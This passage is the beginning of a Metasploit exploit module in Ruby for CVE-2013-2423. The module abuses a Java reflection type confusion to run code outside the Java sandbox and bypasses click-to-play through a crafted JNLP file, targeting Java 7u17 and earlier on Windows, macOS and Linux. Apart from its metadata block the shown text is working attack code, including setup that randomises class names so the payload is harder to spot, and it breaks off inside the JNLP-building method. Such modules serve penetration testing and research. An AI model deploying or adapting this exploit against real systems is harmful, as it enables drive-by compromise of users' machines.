##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Applet Reflection Type Confusion Remote Code Execution',
'Description' => %q{
This module abuses Java Reflection to generate a Type Confusion, due to a weak
access control when setting final fields on static classes, and run code outside of
the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This
exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is
applied mainly to IE, when Java Web Start can be launched automatically throw the
ActiveX control. Otherwise the applet is launched without click-to-play bypass.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jeroen Frijters', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2423' ],
[ 'OSVDB', '92348' ],
[ 'BID', '59162' ],
[ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ],
[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f' ],
[ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ]
],
'Platform' => %w{ java linux osx win },
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => '2013-01-10'
))
end
def setup
path = File.join(Msf::Config.data_directory, "exploits", "jre7u17", "Exploit.class")
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.data_directory, "exploits", "jre7u17", "Union1.class")
@union1_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.data_directory, "exploits", "jre7u17", "Union2.class")
@union2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.data_directory, "exploits", "jre7u17", "SystemClass.class")
@system_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
@exploit_class_name = rand_text_alpha("Exploit".length)
@exploit_class.gsub!("Exploit", @exploit_class_name)
@jnlp_name = rand_text_alpha(8)
super
end
def jnlp_file
jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
jnlp = %Q|